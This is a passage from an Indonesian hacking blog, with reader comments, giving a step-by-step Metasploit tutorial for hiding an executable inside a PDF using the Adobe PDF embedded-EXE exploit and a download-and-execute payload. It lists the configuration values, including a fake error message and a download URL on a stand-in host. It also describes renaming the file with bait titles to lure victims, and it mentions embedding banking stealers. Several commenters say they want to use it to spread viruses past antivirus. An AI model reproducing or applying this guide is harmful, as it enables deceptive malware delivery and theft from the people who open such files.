Home / Virus / Menyebarkan Malicious Code Melalui Metasploit
icon_e_biggrin

Menyebarkan Malicious Code Melalui Metasploit

Mungkin sebagian besar orang-orang yg bergelut di bidang IT pernah mendengar ataupun pernah memakai salah satu Framework Development Vulnerability ini,Yup, jika anda belum pernah mengenal apa itu Metasploit silahkan anda mengunjungi situs utamanya yaitu http://metasploit.com dan referensi nya melalui search engine kesukaan anda.

Pada kali ini saya akan menggambarkan salah satu teknik Blackhat dalam memanfaatkan Metasploit sebagai senjata yang powerfull dalam menyebarkan Malicious Code baik itu Trojan, Virus, Botnet, ataupun Rootkit melalui teknik rekayasa social (Social Enginering).

Ok, buat persiapan kita akan mempersiapkan sebuah File PDF dan Virus (Fake).
Untuk file virus palsu kita coba bangun dari sebuah bahasa Visual Basic.Berikut potongan kodenya. Yg mana jika tombol ditekan maka akan menghasilkan tulisan “Selamat Komputer Anda Kena Virus

Code:

Setelah Virus Palsu, Selanjutnya kita perlu menyiapkan sebuah File e-book untuk media sosial engginering dan Metasploit sebagai Alat untuk meracik kedua file tersebut.Proses Meracik Adonan

  1. Download dan Instal metasploit anda
  2. Setelah installasi selesai, pilihlah metasploit web yaitu pada Start –> Metasploit Framework –> msfweb
  3. Setelah load pilih tab Exploit dan carilah exploit “Adobe PDF Embedded EXE Social Engineering”. Exploit ini dapat berjalan pada Adobe Reader v8.x, v9.x

4. Pilih “windows/download_exec”

5. Selanjutnya kita akan dihadapkan kepada pengaturan standart untuk menkonfigurasi file yang akan diracik.

EXENAME : Path / Directory tempat File Virus berada
ex my linux directory: /home/valencia/contoh_virus.exe

INFILENAME : Path / Directory tempat E-BOOK / PDF berada
ex my linux directory : /home/valencia/ebook_palsu.pdf

FILENAME : Merupakan Output Hasil File
ex: evil.pdf

LAUNCH MESSAGE : Pesan kesalahan yg ditampilkan
ex : To view the encrypted content please tick the
“Do not show this message again” box and press Open.

OUTPUTPATH : Path / Directory tempat File gabungan berada
ex my linux directory: /home/valencia/

URL : Alamat web yg digunakan untuk mendownload executable.
ex : http://site-fake.com/evil_update.pdf
6. Selanjutnya klik tombol Launch Exploit. Jika berhasil maka akan ada file baru yg bernama evil.pdf di path /home/valencia/

Setelah semua adonan selesai diracik saatnya melakukan penyebaran dengan teknik social enginering. File hasil generate yg bernama evil.pdf bisa di Rename dengan judul yg menarik minat seseorang untuk mengeksekusinya, misalnya “ Cara Mendapatkan Uang Gratis Di Internet”.

Ok, ga perlu dijelaskan bagaimana cara menyebarkan, karena saya yakin anda terlalu pintar untuk itu…lolz J
Sekarang kita lihat , bagaimana jika file itu kita eksekusi. Apakah dengan teknik ini file virus palsu dapat berjalan jika e-book itu dijalankan ?




Setelah di jalankan, file evil.pdf tadi akan menjalankan command prompt dan kemudian menampilkan pesan error sesuai dengan LAUNCH MESSAGE yg kita setting tadi.

– Dan jika kita menutup dialog box dari error tersebut maka program virus palsu yg berada pada badan file evil.pdf tersebut akan dijalankan dan menampilkan pesan.
Dari ilustrasi teknik di atas, mungkin anda akan berpikir jika dulu E-book yg ada di internet bukanlah sesuatu ancaman bagi anda tapi sekarang mereka bisa menjadi ancaman serius bagi keamanan anda.

Coba bayangkan, file yg diselipkan itu adalah sebuah program yang bertugas mencuri data banking seperti Zeus, SpyEye. Saya yakin E-book yang ada dalam PC / Laptop anda sudah masuk ke Recycle Bin (Just Kidding .)Anyway…….sekian bahasan pendek yg bisa saya sampaikan. Moga saja kita dapat lebih aware terhadap ancaman-ancaman yang ada di dunia maya.
Salam……………..

Download Versi PDF
http://warungdesign.net/ebook/Memanfaatkan Metasploit Dalam Penyebaran Malicious Code.rar


Created By: Aurel 666
Shoutz:
God Al Mighty Jasakom | ECHO | XYB | SumatraHacker | Sekurity Online | And all Underground Community My Friend in Cyber World (maaf ga bisa nyebutin satu2 coz banyak banget )
Specially To Dark Valencia (4420s) dan Lab Kecilku

About Artikel

Check Also

malware-api-winapi-binushacker

Kumpulan Fungsi WinAPI Pada Malware

Virus, Worm, Trojan, Spyware dan sebagainya yang termasuk kategori Malware atau malicious software mungkin sering …

13 comments

  1. maaf masih newbie bang….bisa didelet kan ebook palsunya itu…?

  2. +1 deh….& +ilmu juga….
    Emang gak kedetek sama antivirus file pdfnya gan?

  3. Waaaaaaaahhh….
    Maangstaaaaabbb bro.
    + 1 ilmu
    🙂

  4. bang masih newbie bang bisa kasih tutorialnya yg labih jelas kaga mau tuh saya ilmunya di tambah ++++nya buat di otak gw heheh ^_^

  5. Muuuuantab boz

  6. ni size softwarenya 200MB yah??? 🙁

  7. Hmmt… Sebuah Inovasi Baru…

    And Ane Juga Baru Tahu Tentang Yang Satu Ini…

    Thanks To Agan Aurel 666 Coz VXer Pada Bisa Ngemmbeed Virus Nyo.. Coz Kalo Pake Binder Banyak Yang Kedetect…

    Regardz

    Dark Cyber , Lamerz Crew 😀

  8. thanks infonya gan..
    mantaps..
    tapi awas ah, versi pdf yang agan cantumin juga bervirus.. hihi.. 😛
    😀 ups..

  9. wahahaha konyol gan, kreatif idenya..
    bisa neh dicoba 😀

  10. kurang puas

    tp pingin buat virus yang langsung aktif ke antivirusnya???

    jadi keliatanya org yg buka kaget hahah

  11. pdf yg didownload it gimna mas… maaf masih newbie

  12. mas…. MAAF YA .. sebb bru ngerti .. mohn ksih petnjknya y mas..

Tinggalkan Balasan ke zaka Batalkan balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *